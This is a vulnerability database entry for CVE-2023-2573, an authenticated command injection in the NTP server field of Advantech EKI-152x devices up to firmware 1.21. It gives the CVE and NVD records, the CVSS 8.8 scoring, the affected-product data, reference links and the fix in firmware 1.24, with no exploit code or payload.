CVE-2023-2573 (GCVE-0-2023-2573)

Vulnerability from cvelistv5 – Published: 2023-05-08 12:33 – Updated: 2025-02-13 16:44

Title

Authenticated Command Injection

Summary

Advantech EKI-1524, EKI-1522, EKI-1521 devices through 1.21 are affected by an command injection vulnerability in the NTP server input field, which can be triggered by authenticated users via a crafted POST request.

Severity ?

8.8 (High)


                        
                          CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

CWE

CWE-78 - Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')

Assigner

CyberDanube

References

URL

Tags

	https://www.advantech.com/en/support/details/firm…	patch
	https://www.advantech.com/en/support/details/firm…	patch
	https://www.advantech.com/en/support/details/firm…	patch
	https://cyberdanube.com/en/multiple-vulnerabiliti…	third-party-advisory
	http://seclists.org/fulldisclosure/2023/May/4
	http://packetstormsecurity.com/files/172307/Advan…

Impacted products

Vendor

Product

Version

Advantech

EKI-1524

Affected: 0 , ≤ 1.21 (custom)

	Advantech	EKI-1522	Affected: 0 , ≤ 1.21 (custom)
	Advantech	EKI-1521	Affected: 0 , ≤ 1.21 (custom)

Credits

S. Dietz (CyberDanube) T. Weber (CyberDanube)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T06:26:09.816Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "patch",
              "x_transferred"
            ],
            "url": "https://www.advantech.com/en/support/details/firmware?id=1-1J9BED3"
          },
          {
            "tags": [
              "patch",
              "x_transferred"
            ],
            "url": "https://www.advantech.com/en/support/details/firmware?id=1-1J9BEBL"
          },
          {
            "tags": [
              "patch",
              "x_transferred"
            ],
            "url": "https://www.advantech.com/en/support/details/firmware?id=1-1J9BECT"
          },
          {
            "tags": [
              "third-party-advisory",
              "x_transferred"
            ],
            "url": "https://cyberdanube.com/en/multiple-vulnerabilities-in-advantech-eki-15xx-series/"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "http://seclists.org/fulldisclosure/2023/May/4"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "http://packetstormsecurity.com/files/172307/Advantech-EKI-15XX-Series-Command-Injection-Buffer-Overflow.html"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2023-2573",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2025-01-29T15:17:30.343857Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2025-01-29T15:17:41.505Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "EKI-1524",
          "vendor": "Advantech",
          "versions": [
            {
              "lessThanOrEqual": "1.21",
              "status": "affected",
              "version": "0",
              "versionType": "custom"
            }
          ]
        },
        {
          "defaultStatus": "unaffected",
          "product": "EKI-1522",
          "vendor": "Advantech",
          "versions": [
            {
              "lessThanOrEqual": "1.21",
              "status": "affected",
              "version": "0",
              "versionType": "custom"
            }
          ]
        },
        {
          "defaultStatus": "unaffected",
          "product": "EKI-1521",
          "vendor": "Advantech",
          "versions": [
            {
              "lessThanOrEqual": "1.21",
              "status": "affected",
              "version": "0",
              "versionType": "custom"
            }
          ]
        }
      ],
      "credits": [
        {
          "lang": "en",
          "type": "finder",
          "user": "00000000-0000-4000-9000-000000000000",
          "value": "S. Dietz (CyberDanube)"
        },
        {
          "lang": "en",
          "type": "finder",
          "user": "00000000-0000-4000-9000-000000000000",
          "value": "T. Weber (CyberDanube)"
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "supportingMedia": [
            {
              "base64": false,
              "type": "text/html",
              "value": "\u003cdiv\u003e\u003cp\u003eAdvantech EKI-1524, EKI-1522, EKI-1521 devices through 1.21 are affected by an command injection vulnerability in the NTP server input field, which can be triggered by authenticated users via a crafted POST request.\u003c/p\u003e\u003c/div\u003e"
            }
          ],
          "value": "Advantech EKI-1524, EKI-1522, EKI-1521 devices through 1.21 are affected by an command injection vulnerability in the NTP server input field, which can be triggered by authenticated users via a crafted POST request."
        }
      ],
      "impacts": [
        {
          "capecId": "CAPEC-88",
          "descriptions": [
            {
              "lang": "en",
              "value": "CAPEC-88 OS Command Injection"
            }
          ]
        }
      ],
      "metrics": [
        {
          "cvssV3_1": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 8.8,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          },
          "format": "CVSS",
          "scenarios": [
            {
              "lang": "en",
              "value": "GENERAL"
            }
          ]
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-78",
              "description": "CWE-78 Improper Neutralization of Special Elements used in an OS Command (\u0027OS Command Injection\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2023-05-12T17:06:13.164Z",
        "orgId": "7d092a75-6bbd-48c6-a15a-0297458009bc",
        "shortName": "CyberDanube"
      },
      "references": [
        {
          "tags": [
            "patch"
          ],
          "url": "https://www.advantech.com/en/support/details/firmware?id=1-1J9BED3"
        },
        {
          "tags": [
            "patch"
          ],
          "url": "https://www.advantech.com/en/support/details/firmware?id=1-1J9BEBL"
        },
        {
          "tags": [
            "patch"
          ],
          "url": "https://www.advantech.com/en/support/details/firmware?id=1-1J9BECT"
        },
        {
          "tags": [
            "third-party-advisory"
          ],
          "url": "https://cyberdanube.com/en/multiple-vulnerabilities-in-advantech-eki-15xx-series/"
        },
        {
          "url": "http://seclists.org/fulldisclosure/2023/May/4"
        },
        {
          "url": "http://packetstormsecurity.com/files/172307/Advantech-EKI-15XX-Series-Command-Injection-Buffer-Overflow.html"
        }
      ],
      "solutions": [
        {
          "lang": "en",
          "supportingMedia": [
            {
              "base64": false,
              "type": "text/html",
              "value": "Install firmware 1.24 to fix the issue."
            }
          ],
          "value": "Install firmware 1.24 to fix the issue."
        }
      ],
      "source": {
        "discovery": "EXTERNAL"
      },
      "title": "Authenticated Command Injection",
      "x_generator": {
        "engine": "Vulnogram 0.1.0-dev"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "7d092a75-6bbd-48c6-a15a-0297458009bc",
    "assignerShortName": "CyberDanube",
    "cveId": "CVE-2023-2573",
    "datePublished": "2023-05-08T12:33:06.707Z",
    "dateReserved": "2023-05-08T11:13:17.725Z",
    "dateUpdated": "2025-02-13T16:44:35.870Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1",
  "vulnerability-lookup:meta": {
    "fkie_nvd": {
      "configurations": "[{\"operator\": \"AND\", \"nodes\": [{\"operator\": \"OR\", \"negate\": false, \"cpeMatch\": [{\"vulnerable\": true, \"criteria\": \"cpe:2.3:o:advantech:eki-1521_firmware:*:*:*:*:*:*:*:*\", \"versionEndIncluding\": \"1.21\", \"matchCriteriaId\": \"63022BB6-061F-4869-AF9D-D422932612FB\"}]}, {\"operator\": \"OR\", \"negate\": false, \"cpeMatch\": [{\"vulnerable\": false, \"criteria\": \"cpe:2.3:h:advantech:eki-1521:-:*:*:*:*:*:*:*\", \"matchCriteriaId\": \"FC553347-9FAB-467F-8ED7-45878D9D9886\"}]}]}, {\"operator\": \"AND\", \"nodes\": [{\"operator\": \"OR\", \"negate\": false, \"cpeMatch\": [{\"vulnerable\": true, \"criteria\": \"cpe:2.3:o:advantech:eki-1522_firmware:*:*:*:*:*:*:*:*\", \"versionEndIncluding\": \"1.21\", \"matchCriteriaId\": \"5A379029-41F7-4364-BDF5-7FB16CF80063\"}]}, {\"operator\": \"OR\", \"negate\": false, \"cpeMatch\": [{\"vulnerable\": false, \"criteria\": \"cpe:2.3:h:advantech:eki-1522:-:*:*:*:*:*:*:*\", \"matchCriteriaId\": \"4B99453E-E903-40D9-8417-33C38A414052\"}]}]}, {\"operator\": \"AND\", \"nodes\": [{\"operator\": \"OR\", \"negate\": false, \"cpeMatch\": [{\"vulnerable\": true, \"criteria\": \"cpe:2.3:o:advantech:eki-1524_firmware:*:*:*:*:*:*:*:*\", \"versionEndIncluding\": \"1.21\", \"matchCriteriaId\": \"5F979623-F2E3-4C9E-AA1F-8F8859118398\"}]}, {\"operator\": \"OR\", \"negate\": false, \"cpeMatch\": [{\"vulnerable\": false, \"criteria\": \"cpe:2.3:h:advantech:eki-1524:-:*:*:*:*:*:*:*\", \"matchCriteriaId\": \"2539F0F2-3146-4722-BAF1-073BEBE0FDAC\"}]}]}]",
      "descriptions": "[{\"lang\": \"en\", \"value\": \"Advantech EKI-1524, EKI-1522, EKI-1521 devices through 1.21 are affected by an command injection vulnerability in the NTP server input field, which can be triggered by authenticated users via a crafted POST request.\\n\\n\\n\\n\"}]",
      "id": "CVE-2023-2573",
      "lastModified": "2024-11-21T07:58:51.480",
      "metrics": "{\"cvssMetricV31\": [{\"source\": \"office@cyberdanube.com\", \"type\": \"Secondary\", \"cvssData\": {\"version\": \"3.1\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\", \"baseScore\": 8.8, \"baseSeverity\": \"HIGH\", \"attackVector\": \"NETWORK\", \"attackComplexity\": \"LOW\", \"privilegesRequired\": \"LOW\", \"userInteraction\": \"NONE\", \"scope\": \"UNCHANGED\", \"confidentialityImpact\": \"HIGH\", \"integrityImpact\": \"HIGH\", \"availabilityImpact\": \"HIGH\"}, \"exploitabilityScore\": 2.8, \"impactScore\": 5.9}, {\"source\": \"nvd@nist.gov\", \"type\": \"Primary\", \"cvssData\": {\"version\": \"3.1\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\", \"baseScore\": 8.8, \"baseSeverity\": \"HIGH\", \"attackVector\": \"NETWORK\", \"attackComplexity\": \"LOW\", \"privilegesRequired\": \"LOW\", \"userInteraction\": \"NONE\", \"scope\": \"UNCHANGED\", \"confidentialityImpact\": \"HIGH\", \"integrityImpact\": \"HIGH\", \"availabilityImpact\": \"HIGH\"}, \"exploitabilityScore\": 2.8, \"impactScore\": 5.9}]}",
      "published": "2023-05-08T13:15:09.710",
      "references": "[{\"url\": \"http://packetstormsecurity.com/files/172307/Advantech-EKI-15XX-Series-Command-Injection-Buffer-Overflow.html\", \"source\": \"office@cyberdanube.com\"}, {\"url\": \"http://seclists.org/fulldisclosure/2023/May/4\", \"source\": \"office@cyberdanube.com\", \"tags\": [\"Exploit\", \"Third Party Advisory\"]}, {\"url\": \"https://cyberdanube.com/en/multiple-vulnerabilities-in-advantech-eki-15xx-series/\", \"source\": \"office@cyberdanube.com\", \"tags\": [\"Exploit\", \"Third Party Advisory\"]}, {\"url\": \"https://www.advantech.com/en/support/details/firmware?id=1-1J9BEBL\", \"source\": \"office@cyberdanube.com\", \"tags\": [\"Patch\", \"Product\"]}, {\"url\": \"https://www.advantech.com/en/support/details/firmware?id=1-1J9BECT\", \"source\": \"office@cyberdanube.com\", \"tags\": [\"Patch\", \"Product\"]}, {\"url\": \"https://www.advantech.com/en/support/details/firmware?id=1-1J9BED3\", \"source\": \"office@cyberdanube.com\", \"tags\": [\"Patch\", \"Product\"]}, {\"url\": \"http://packetstormsecurity.com/files/172307/Advantech-EKI-15XX-Series-Command-Injection-Buffer-Overflow.html\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\"}, {\"url\": \"http://seclists.org/fulldisclosure/2023/May/4\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\", \"tags\": [\"Exploit\", \"Third Party Advisory\"]}, {\"url\": \"https://cyberdanube.com/en/multiple-vulnerabilities-in-advantech-eki-15xx-series/\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\", \"tags\": [\"Exploit\", \"Third Party Advisory\"]}, {\"url\": \"https://www.advantech.com/en/support/details/firmware?id=1-1J9BEBL\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\", \"tags\": [\"Patch\", \"Product\"]}, {\"url\": \"https://www.advantech.com/en/support/details/firmware?id=1-1J9BECT\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\", \"tags\": [\"Patch\", \"Product\"]}, {\"url\": \"https://www.advantech.com/en/support/details/firmware?id=1-1J9BED3\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\", \"tags\": [\"Patch\", \"Product\"]}]",
      "sourceIdentifier": "office@cyberdanube.com",
      "vulnStatus": "Modified",
      "weaknesses": "[{\"source\": \"office@cyberdanube.com\", \"type\": \"Secondary\", \"description\": [{\"lang\": \"en\", \"value\": \"CWE-78\"}]}, {\"source\": \"nvd@nist.gov\", \"type\": \"Primary\", \"description\": [{\"lang\": \"en\", \"value\": \"CWE-77\"}]}]"
    },
    "nvd": "{\"cve\":{\"id\":\"CVE-2023-2573\",\"sourceIdentifier\":\"office@cyberdanube.com\",\"published\":\"2023-05-08T13:15:09.710\",\"lastModified\":\"2025-02-13T17:16:21.390\",\"vulnStatus\":\"Modified\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Advantech EKI-1524, EKI-1522, EKI-1521 devices through 1.21 are affected by an command injection vulnerability in the NTP server input field, which can be triggered by authenticated users via a crafted POST request.\"}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"office@cyberdanube.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\",\"baseScore\":8.8,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":2.8,\"impactScore\":5.9},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\",\"baseScore\":8.8,\"baseSeverity\":\"HIGH\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"scope\":\"UNCHANGED\",\"confidentialityImpact\":\"HIGH\",\"integrityImpact\":\"HIGH\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":2.8,\"impactScore\":5.9}]},\"weaknesses\":[{\"source\":\"office@cyberdanube.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-78\"}]},{\"source\":\"nvd@nist.gov\",\"type\":\"Primary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-77\"}]}],\"configurations\":[{\"operator\":\"AND\",\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:advantech:eki-1521_firmware:*:*:*:*:*:*:*:*\",\"versionEndIncluding\":\"1.21\",\"matchCriteriaId\":\"63022BB6-061F-4869-AF9D-D422932612FB\"}]},{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":false,\"criteria\":\"cpe:2.3:h:advantech:eki-1521:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"FC553347-9FAB-467F-8ED7-45878D9D9886\"}]}]},{\"operator\":\"AND\",\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:advantech:eki-1522_firmware:*:*:*:*:*:*:*:*\",\"versionEndIncluding\":\"1.21\",\"matchCriteriaId\":\"5A379029-41F7-4364-BDF5-7FB16CF80063\"}]},{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":false,\"criteria\":\"cpe:2.3:h:advantech:eki-1522:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"4B99453E-E903-40D9-8417-33C38A414052\"}]}]},{\"operator\":\"AND\",\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:advantech:eki-1524_firmware:*:*:*:*:*:*:*:*\",\"versionEndIncluding\":\"1.21\",\"matchCriteriaId\":\"5F979623-F2E3-4C9E-AA1F-8F8859118398\"}]},{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":false,\"criteria\":\"cpe:2.3:h:advantech:eki-1524:-:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"2539F0F2-3146-4722-BAF1-073BEBE0FDAC\"}]}]}],\"references\":[{\"url\":\"http://packetstormsecurity.com/files/172307/Advantech-EKI-15XX-Series-Command-Injection-Buffer-Overflow.html\",\"source\":\"office@cyberdanube.com\"},{\"url\":\"http://seclists.org/fulldisclosure/2023/May/4\",\"source\":\"office@cyberdanube.com\",\"tags\":[\"Exploit\",\"Third Party Advisory\"]},{\"url\":\"https://cyberdanube.com/en/multiple-vulnerabilities-in-advantech-eki-15xx-series/\",\"source\":\"office@cyberdanube.com\",\"tags\":[\"Exploit\",\"Third Party Advisory\"]},{\"url\":\"https://www.advantech.com/en/support/details/firmware?id=1-1J9BEBL\",\"source\":\"office@cyberdanube.com\",\"tags\":[\"Patch\",\"Product\"]},{\"url\":\"https://www.advantech.com/en/support/details/firmware?id=1-1J9BECT\",\"source\":\"office@cyberdanube.com\",\"tags\":[\"Patch\",\"Product\"]},{\"url\":\"https://www.advantech.com/en/support/details/firmware?id=1-1J9BED3\",\"source\":\"office@cyberdanube.com\",\"tags\":[\"Patch\",\"Product\"]},{\"url\":\"http://packetstormsecurity.com/files/172307/Advantech-EKI-15XX-Series-Command-Injection-Buffer-Overflow.html\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\"},{\"url\":\"http://seclists.org/fulldisclosure/2023/May/4\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Exploit\",\"Third Party Advisory\"]},{\"url\":\"https://cyberdanube.com/en/multiple-vulnerabilities-in-advantech-eki-15xx-series/\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Exploit\",\"Third Party Advisory\"]},{\"url\":\"https://www.advantech.com/en/support/details/firmware?id=1-1J9BEBL\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Patch\",\"Product\"]},{\"url\":\"https://www.advantech.com/en/support/details/firmware?id=1-1J9BECT\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Patch\",\"Product\"]},{\"url\":\"https://www.advantech.com/en/support/details/firmware?id=1-1J9BED3\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Patch\",\"Product\"]}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CVE Program Container\", \"references\": [{\"url\": \"https://www.advantech.com/en/support/details/firmware?id=1-1J9BED3\", \"tags\": [\"patch\", \"x_transferred\"]}, {\"url\": \"https://www.advantech.com/en/support/details/firmware?id=1-1J9BEBL\", \"tags\": [\"patch\", \"x_transferred\"]}, {\"url\": \"https://www.advantech.com/en/support/details/firmware?id=1-1J9BECT\", \"tags\": [\"patch\", \"x_transferred\"]}, {\"url\": \"https://cyberdanube.com/en/multiple-vulnerabilities-in-advantech-eki-15xx-series/\", \"tags\": [\"third-party-advisory\", \"x_transferred\"]}, {\"url\": \"http://seclists.org/fulldisclosure/2023/May/4\", \"tags\": [\"x_transferred\"]}, {\"url\": \"http://packetstormsecurity.com/files/172307/Advantech-EKI-15XX-Series-Command-Injection-Buffer-Overflow.html\", \"tags\": [\"x_transferred\"]}], \"providerMetadata\": {\"orgId\": \"af854a3a-2127-422b-91ae-364da2661108\", \"shortName\": \"CVE\", \"dateUpdated\": \"2024-08-02T06:26:09.816Z\"}}, {\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2023-2573\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"total\"}], \"version\": \"2.0.3\", \"timestamp\": \"2025-01-29T15:17:30.343857Z\"}}}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2025-01-29T15:17:37.473Z\"}}], \"cna\": {\"title\": \"Authenticated Command Injection\", \"source\": {\"discovery\": \"EXTERNAL\"}, \"credits\": [{\"lang\": \"en\", \"type\": \"finder\", \"user\": \"00000000-0000-4000-9000-000000000000\", \"value\": \"S. Dietz (CyberDanube)\"}, {\"lang\": \"en\", \"type\": \"finder\", \"user\": \"00000000-0000-4000-9000-000000000000\", \"value\": \"T. Weber (CyberDanube)\"}], \"impacts\": [{\"capecId\": \"CAPEC-88\", \"descriptions\": [{\"lang\": \"en\", \"value\": \"CAPEC-88 OS Command Injection\"}]}], \"metrics\": [{\"format\": \"CVSS\", \"cvssV3_1\": {\"scope\": \"UNCHANGED\", \"version\": \"3.1\", \"baseScore\": 8.8, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"HIGH\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\", \"integrityImpact\": \"HIGH\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"HIGH\", \"privilegesRequired\": \"LOW\", \"confidentialityImpact\": \"HIGH\"}, \"scenarios\": [{\"lang\": \"en\", \"value\": \"GENERAL\"}]}], \"affected\": [{\"vendor\": \"Advantech\", \"product\": \"EKI-1524\", \"versions\": [{\"status\": \"affected\", \"version\": \"0\", \"versionType\": \"custom\", \"lessThanOrEqual\": \"1.21\"}], \"defaultStatus\": \"unaffected\"}, {\"vendor\": \"Advantech\", \"product\": \"EKI-1522\", \"versions\": [{\"status\": \"affected\", \"version\": \"0\", \"versionType\": \"custom\", \"lessThanOrEqual\": \"1.21\"}], \"defaultStatus\": \"unaffected\"}, {\"vendor\": \"Advantech\", \"product\": \"EKI-1521\", \"versions\": [{\"status\": \"affected\", \"version\": \"0\", \"versionType\": \"custom\", \"lessThanOrEqual\": \"1.21\"}], \"defaultStatus\": \"unaffected\"}], \"solutions\": [{\"lang\": \"en\", \"value\": \"Install firmware 1.24 to fix the issue.\", \"supportingMedia\": [{\"type\": \"text/html\", \"value\": \"Install firmware 1.24 to fix the issue.\", \"base64\": false}]}], \"references\": [{\"url\": \"https://www.advantech.com/en/support/details/firmware?id=1-1J9BED3\", \"tags\": [\"patch\"]}, {\"url\": \"https://www.advantech.com/en/support/details/firmware?id=1-1J9BEBL\", \"tags\": [\"patch\"]}, {\"url\": \"https://www.advantech.com/en/support/details/firmware?id=1-1J9BECT\", \"tags\": [\"patch\"]}, {\"url\": \"https://cyberdanube.com/en/multiple-vulnerabilities-in-advantech-eki-15xx-series/\", \"tags\": [\"third-party-advisory\"]}, {\"url\": \"http://seclists.org/fulldisclosure/2023/May/4\"}, {\"url\": \"http://packetstormsecurity.com/files/172307/Advantech-EKI-15XX-Series-Command-Injection-Buffer-Overflow.html\"}], \"x_generator\": {\"engine\": \"Vulnogram 0.1.0-dev\"}, \"descriptions\": [{\"lang\": \"en\", \"value\": \"Advantech EKI-1524, EKI-1522, EKI-1521 devices through 1.21 are affected by an command injection vulnerability in the NTP server input field, which can be triggered by authenticated users via a crafted POST request.\\n\\n\\n\\n\", \"supportingMedia\": [{\"type\": \"text/html\", \"value\": \"\u003cdiv\u003e\u003cp\u003eAdvantech EKI-1524, EKI-1522, EKI-1521 devices through 1.21 are affected by an command injection vulnerability in the NTP server input field, which can be triggered by authenticated users via a crafted POST request.\u003c/p\u003e\u003c/div\u003e\", \"base64\": false}]}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-78\", \"description\": \"CWE-78 Improper Neutralization of Special Elements used in an OS Command (\u0027OS Command Injection\u0027)\"}]}], \"providerMetadata\": {\"orgId\": \"7d092a75-6bbd-48c6-a15a-0297458009bc\", \"shortName\": \"CyberDanube\", \"dateUpdated\": \"2023-05-11T11:14:33.348Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2023-2573\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2025-01-29T15:17:41.505Z\", \"dateReserved\": \"2023-05-08T11:13:17.725Z\", \"assignerOrgId\": \"7d092a75-6bbd-48c6-a15a-0297458009bc\", \"datePublished\": \"2023-05-08T12:33:06.707Z\", \"assignerShortName\": \"CyberDanube\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }
  }
}

FKIE_CVE-2023-2573

Vulnerability from fkie_nvd - Published: 2023-05-08 13:15 - Updated: 2025-02-13 17:16

Severity ?

8.8 (High) - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
8.8 (High) - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Summary

References

URL	Tags
office@cyberdanube.com	http://packetstormsecurity.com/files/172307/Advantech-EKI-15XX-Series-Command-Injection-Buffer-Overflow.html
office@cyberdanube.com	http://seclists.org/fulldisclosure/2023/May/4	Exploit, Third Party Advisory
office@cyberdanube.com	https://cyberdanube.com/en/multiple-vulnerabilities-in-advantech-eki-15xx-series/	Exploit, Third Party Advisory
office@cyberdanube.com	https://www.advantech.com/en/support/details/firmware?id=1-1J9BEBL	Patch, Product
office@cyberdanube.com	https://www.advantech.com/en/support/details/firmware?id=1-1J9BECT	Patch, Product
office@cyberdanube.com	https://www.advantech.com/en/support/details/firmware?id=1-1J9BED3	Patch, Product
af854a3a-2127-422b-91ae-364da2661108	http://packetstormsecurity.com/files/172307/Advantech-EKI-15XX-Series-Command-Injection-Buffer-Overflow.html
af854a3a-2127-422b-91ae-364da2661108	http://seclists.org/fulldisclosure/2023/May/4	Exploit, Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108	https://cyberdanube.com/en/multiple-vulnerabilities-in-advantech-eki-15xx-series/	Exploit, Third Party Advisory
af854a3a-2127-422b-91ae-364da2661108	https://www.advantech.com/en/support/details/firmware?id=1-1J9BEBL	Patch, Product
af854a3a-2127-422b-91ae-364da2661108	https://www.advantech.com/en/support/details/firmware?id=1-1J9BECT	Patch, Product
af854a3a-2127-422b-91ae-364da2661108	https://www.advantech.com/en/support/details/firmware?id=1-1J9BED3	Patch, Product

Impacted products

Vendor	Product	Version
advantech	eki-1521_firmware	*
advantech	eki-1521	-
advantech	eki-1522_firmware	*
advantech	eki-1522	-
advantech	eki-1524_firmware	*
advantech	eki-1524	-

JSON

To clipboard

{
  "configurations": [
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:advantech:eki-1521_firmware:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "63022BB6-061F-4869-AF9D-D422932612FB",
              "versionEndIncluding": "1.21",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        },
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:h:advantech:eki-1521:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "FC553347-9FAB-467F-8ED7-45878D9D9886",
              "vulnerable": false
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ],
      "operator": "AND"
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:advantech:eki-1522_firmware:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "5A379029-41F7-4364-BDF5-7FB16CF80063",
              "versionEndIncluding": "1.21",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        },
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:h:advantech:eki-1522:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "4B99453E-E903-40D9-8417-33C38A414052",
              "vulnerable": false
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ],
      "operator": "AND"
    },
    {
      "nodes": [
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:o:advantech:eki-1524_firmware:*:*:*:*:*:*:*:*",
              "matchCriteriaId": "5F979623-F2E3-4C9E-AA1F-8F8859118398",
              "versionEndIncluding": "1.21",
              "vulnerable": true
            }
          ],
          "negate": false,
          "operator": "OR"
        },
        {
          "cpeMatch": [
            {
              "criteria": "cpe:2.3:h:advantech:eki-1524:-:*:*:*:*:*:*:*",
              "matchCriteriaId": "2539F0F2-3146-4722-BAF1-073BEBE0FDAC",
              "vulnerable": false
            }
          ],
          "negate": false,
          "operator": "OR"
        }
      ],
      "operator": "AND"
    }
  ],
  "cveTags": [],
  "descriptions": [
    {
      "lang": "en",
      "value": "Advantech EKI-1524, EKI-1522, EKI-1521 devices through 1.21 are affected by an command injection vulnerability in the NTP server input field, which can be triggered by authenticated users via a crafted POST request."
    }
  ],
  "id": "CVE-2023-2573",
  "lastModified": "2025-02-13T17:16:21.390",
